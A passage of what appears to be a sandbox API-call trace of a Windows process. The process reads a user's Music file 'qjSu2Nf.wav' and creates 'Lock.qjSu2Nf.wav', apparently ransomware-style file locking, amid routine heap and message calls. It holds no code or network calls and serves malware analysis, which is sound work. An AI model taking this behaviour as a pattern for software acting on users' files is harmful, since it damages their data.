(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qjSu2Nf.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qjsu2nf.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0252.605] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.605] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0252.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0252.605] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.605] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.qjSu2Nf.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.qjsu2nf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0252.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0252.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0252.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0252.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.608] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0252.608] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xafeb, lpOverlapped=0x0) returned 1 [0252.610] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0252.612] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0252.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xafeb) returned 0x24c7a50 [0252.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0252.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.614] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0252.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0252.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0252.614] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.614] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0252.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0252.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xafeb) returned 0x24c7a50 [0252.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0252.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0252.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0252.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xafeb) returned 0x24dda40 [0252.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0252.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.618] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.619] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0252.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.619] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.619] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.622] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.622] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.622] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.623] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.623] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.623] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.623] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.623] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.623] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.624] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 